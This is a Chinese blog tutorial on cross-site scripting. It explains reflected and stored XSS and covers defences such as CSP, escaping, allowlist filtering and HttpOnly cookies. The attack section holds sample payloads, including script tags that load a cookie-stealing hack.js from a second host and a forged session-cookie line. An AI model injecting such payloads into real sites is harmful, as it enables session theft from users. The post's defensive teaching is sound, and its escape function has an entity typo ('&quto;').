XSS

最新推荐文章于 2022-04-22 10:06:14 发布
最新推荐文章于 2022-04-22 10:06:14 发布
阅读量108 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38066007/article/details/108619539
版权

XSS

Cross Site Scripting  跨站脚本攻击


XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS。

跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻击。


跨站脚本攻击有可能造成以下影响:


       利用虚假输入表单骗取用户个人信息。
       利用脚本窃取用户的Cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求。
       显示伪造的文章或图片。

 

XSS攻击分类


      反射型 - url参数直接注入

                // 普通
               http://localhost:3000/?from=china、


              // alert尝试
             http://localhost:3000/?from=<script>alert(3)</script>


            // 获取Cookie
            http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"></script>


           // 短域名伪造      https://dwz.cn/

          // 伪造cookie入侵 chrome                                                                                       document.cookie="kaikeba:sess=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUzNTY1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="

 

         存储型 - 存储到DB后读取时注入

                  // 评论
                 <script>alert(1)</script>


                // 跨站脚本注入
                我来了<script src="http://localhost:4000/hack.js"></script>

 

XSS攻击的危害 - Scripting能干啥就能干啥

获取页面数据
获取Cookies
劫持前端逻辑
发送请求
偷取网站的任意数据
偷取用户的资料
偷取用户的秘密和登录态
欺骗用户

 

防范手段

 

HEAD

ctx.set('X-XSS-Protection', 0) // 禁止XSS过滤
// http://localhost:3000/?from=<script>alert(3)</script> 可以拦截 但伪装一下就不行了

 

0 禁止XSS过滤。
1 启用XSS过滤(通常浏览器是默认的)。 如果检测到跨站脚本攻击,浏览器将清除页面(删除
不安全的部分)。
1;mode=block 启用XSS过滤。 如果检测到攻击,浏览器将不会清除页面,而是阻止页面加载。
1; report= (Chromium only)
启用XSS过滤。 如果检测到跨站脚本攻击,浏览器将清除页面并使用CSP report-uri 指令的功能
发送违规报告。

 

CSP

内容安全策略 (CSP, Content Security Policy) 是一个附加的安全层,用于帮助检测和缓解某
些类型的攻击,包括跨站脚本 (XSS) 和数据注入等攻击。 这些攻击可用于实现从数据窃取到
网站破坏或作为恶意软件分发版本等用途。

CSP 本质上就是建立白名单,开发者明确告诉浏览器哪些外部资源可以加载和执行。我们只
需要配置规则,如何拦截是由浏览器自己实现的。我们可以通过这种方式来尽量减少 XSS 攻
击。

 

// 只允许加载本站资源
Content-Security-Policy: default-src 'self'
// 只允许加载 HTTPS 协议图片
Content-Security-Policy: img-src https://*
// 不允许加载任何来源框架
Content-Security-Policy: child-src 'none'
ctx.set('Content-Security-Policy', "default-src 'self'")
// 尝试一下外部资源不能加载
http://localhost:3000/?from=<script src="http://localhost:4000/hack.js">
</script>

 

转义字符

 

黑名单

用户的输入永远不可信任的,最普遍的做法就是转义输入输出的内容,对于引号、尖括号、斜杠进行转义

function escape(str) {
  str = str.replace(/&/g, '&amp;')
  str = str.replace(/</g, '&lt;')
  str = str.replace(/>/g, '&gt;')
  str = str.replace(/"/g, '&quto;')
  str = str.replace(/'/g, '&#39;')
  str = str.replace(/`/g, '&#96;')
  str = str.replace(/\//g, '&#x2F;')
  return str
}

富文本来说,显然不能通过上面的办法来转义所有字符,因为这样会把需要的格式也过滤掉。对
于这种情况,通常采用白名单过滤的办法,当然也可以通过黑名单过滤,但是考虑到需要过滤的
标签和标签属性实在太多,更加推荐使用白名单的方式。

 

白名单

const xss = require('xss')
 let html = xss('<h1 id="title">XSS Demo</h1><script>alert("xss");</script>')
 // -> <h1>XSS Demo</h1>&lt;script&gt;alert("xss");&lt;/script&gt;
 console.log(html)

 

HttpOnly Cookie

这是预防XSS攻击窃取用户cookie最有效的防御手段。Web应 用程序在设置cookie时,将其属性设为HttpOnly,就可以避免该网页的cookie被客户端恶意JavaScript窃取,保护用户cookie信息。

response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly")

 

沿着路走到底
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
面试题之XSS攻击
xiaoyaGrace的博客
05-18 439
XSS跨域脚本攻击原理无需登录认证,核心原理就是向你的页面注入脚本。1、反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。2、存储型:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。(例如:常见的评论,在文本框中输入一段代码,那么就会存放在数据库当中,当再次加载的时候便会执行这样的代码)。常见的场景留言、评论、注册、
Node.js 项目中防止 XSS 攻击
CSDN
07-16 1747
1.SQL 注入 SQL 注入,一般是通过把 SQL 命令插入到 Web 表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的 SQL 命令。 SQL 注入示例 在登录界面,后端会根据用户输入的用户(username)和密码(password),到 MySQL 数据库中去验证用户的身份。 用户输入用户名【cedric】 , 密码【123456】,在后端处理时,会进行如下 sql 语句拼接,当验证用户名和密码成功后,即成功登录。 // 用户名为 cedric , 密码为 123456 sel
XSS攻击
weixin_43342105的博客
03-23 156
xss攻击方式和预防措施 node中怎么预防 const xss=require('xss') //xss是一个函数,将它用到可能会掺杂js代码的地方就可以了
nodejs如何预防xss攻击
weixin_43800535的博客
04-22 3654
nodejs如何预防xss攻击
node 解决存储xss风险报告
dd1095的博客
05-29 301
1. 安装 xss模块 npm install xss 2.在 Node.js 中使用 const xss = require("xss"); // 在项目的接口里面添加 let option = { stripIgnoreTag: true, // 把所有标签替换为空(去掉不在白名单上的标签) }   // 删除默认的d...
springboot整合XSS
03-20
本文将深入探讨如何在Spring Boot项目中整合并预防XSS(Cross-Site Scripting)攻击。XSS是一种常见的网络攻击方式,通过注入恶意脚本到网页中,来窃取用户数据或者执行恶意操作。 一、理解XSS攻击 XSS攻击主要...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
xss_javaxss_XSS_
10-04
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者通过在网页中注入恶意脚本,来劫持用户会话、窃取敏感信息或执行其他恶意操作。Java作为广泛使用的服务器端编程语言,也可能会遭遇...
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
停车场管理系统的简单实现,管理员和系统用户可以通过系统平台实时监管及查找车
08-06
优质项目,资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目。 本人系统开发经验充足,有任何使用问题欢迎随时与我联系,我会及时为你解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(若有),项目具体内容可查看下方的资源详情。 【附带帮助】: 若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步。 【本人专注嵌入式领域】: 有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为你提供帮助,CSDN博客端可私信,为你解惑,欢迎交流。 【适合场景】: 相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可以基于此项目进行扩展来开发出更多功能 【无积分此资源可联系获取】 # 注意 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担。 2. 部分字体以及插图等来自网络,若是侵权请联系删除。积分/付费仅作为资源整理辛苦费用。
数据中心建设与设计方案.ppt
08-06
数据中心建设与设计方案.ppt
毕业设计,基于ASP+ACCESS开发的酒店房间预约系统,内含完整源代码,数据库,毕业论文
08-06
毕业设计,基于ASP+ACCESS开发的酒店房间预约系统,内含完整源代码,数据库,毕业论文 随着计算机技术的飞速发展,信息时代的到来,信息改变了我们这个社会。各类行业在日常经营管理各个方面也在悄悄地走向规范化和网络化。酒店客房管理的信息化程度体现在将计算机及网络与信息技术应用于经营与管理,以现代化工具代替传统手工作业。无疑,使用网络信息化管理使酒店客房管理更先进、更高效、更科学,信息交流更迅速。 酒店房间预约系统是酒店经营管理中不可缺少的部分,它的内容对于经营的决策者和管理者来说都至关重要,所以酒店房间预约系统应该能够为用户提供充足的信息和快捷的预约手段。酒店预约基本都是需要通过电话或客户直接到酒店进行,由于预约记录多是人为完成,容易造成失误和遗漏,管理效率比较低,特别是顾客比较多的季节,传统的预约方式已经基本不能满足要求。 远程预约系统是一种全新的网络预约方式,通过互联网突破了时间和空间限制实现了便捷快速的预约与管理功能。本系统具有房间信息查询、预约房间和取消预约等功能。
附件2 海关跨境电商统一版系统企业对接报文规范(202205版).rar
08-06
该资源用于跨境电商业务,对接广州单一窗口时会用到的资料,一般情况下商务对接流程和海关注册备案流程走完,才能拿到该文档,可以提前参照文档开发
互联网+医疗在昆医附一院的应用.ppt
08-06
互联网+医疗在昆医附一院的应用.ppt
基于Java Swing + MySQL的飞机航空机票订票系统(客户端)
最新发布
08-06
【项目功能】 基于Java Swing + MySQL的飞机航空机票订票系统(客户端)、用户登录订票、查看车票车次、退票、充值个人账户、修改账户信息。:1.建立 flight_data 数据库,执行flight_data.sql 文件;2.更改jdbc的url 为 jdbc:mysql://localhost 【项目介绍】 1、该项目是个人高分项目源码(文档+源码),已获导师指导认可通过,答辩评审分达到96分。 2、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 3、本项目适合计算机相关专业(人工智能、自动化、电子信息、物联网、通信工程、软件工程、网络工程等)的在校学生、老师或者企业员工下载使用,也可作为毕业设计、课程设计、作业、项目初期立项演示等,当然也适合小白学习进阶。 4、作者介绍:某大厂资深算法工程师,从事 Matlab、Python、C/C++、Java、YOLO算法仿真工作10年;路径规划、擅长计算机视觉、目标检测模型、智能优化算法、神经网络预测、信号处理、元胞自动机、图像处理、智能控制、无人机等多种领域的算法仿真实验。 欢迎下载,沟通交流。
毕业设计,基于ASP+ACCESS开发的《信息论与编码》在线考试系统,内含完整源代码,数据库,毕业论文
08-06
毕业设计,基于ASP+ACCESS开发的《信息论与编码》在线考试系统,内含完整源代码,数据库,毕业论文 信息时代计算机网络技术给整个社会带来的冲击已经波及到社会的各个层面,随着现代远程教育的兴起,网络考试系统也开始受到人们的关注。网络化考试系统对节约考试成本,实现远距离的同步考试,提高考试效率,确保考试结果的公平、公正、科学、及时等具有重要的意义。相比传统的考试方式,网络考试的好处是显而易见的,不仅可以动态地管理考试信息,而且还提高了教学的灵活性。本系统采用B/S的体系结构,利用Access设计了系统的数据库,使用ASP语言实现了用户管理、题库管理、试卷生成、在线考试、成绩查询。可以满足《信息论与编码》这门课程客观题的网络考试需求,有效地减速轻了教师的工作负担。 本文介绍了整个考试系统的需求分析、概要设计、以及详细设计,达到了预期的效果。 关键词:网络考试;ASP;ACCESS;B/S体系结构;VBScript
[毕业设计]VB+Access智能工资管理系统设计与实现(源代码+论文+答辩PPT+开题报告+外文翻译).zip
08-06
[毕业设计]VB+Access智能工资管理系统设计与实现(源代码+论文+答辩PPT+开题报告+外文翻译)
深入解析Golang模板引擎:动态内容生成的艺术
08-06
Golang,通常被称为Go语言,是一种由谷歌开发的编程语言。它以简洁、高效、安全著称,并且非常适合构建大规模的分布式系统和微服务。Go语言的一些主要特点包括: 1. **简洁性**:Go语言的语法非常简单,易于学习。 2. **编译速度**:Go语言的编译速度非常快,这使得开发过程更加高效。 3. **并发支持**:Go语言内置了并发编程的支持,通过Goroutines和Channels,可以轻松地实现并发。 4. **内存管理**:Go语言拥有自动垃圾回收机制,简化了内存管理。 5. **静态类型**:Go是一种静态类型语言,这有助于在编译时捕获类型错误。 6. **跨平台**:Go语言支持跨平台编译,可以编译成多种操作系统和架构的二进制文件。 7. **标准库**:Go拥有一个功能丰富的标准库,涵盖了网络编程、文件处理、加密算法等。 8. **工具链**:Go拥有一套完整的工具链,包括gofmt(格式化工具)、go test(测试工具)等。 Go语言自2009年发布以来,已经被广泛应用于云计算、微服务、容器技术(如Docker和Kubernetes)等领域。
XSS攻击应急响应策略
"XSS应急预案已完成" XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入的情况,使得恶意代码能够注入到网页中,并在其他用户加载页面时执行。这些攻击可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值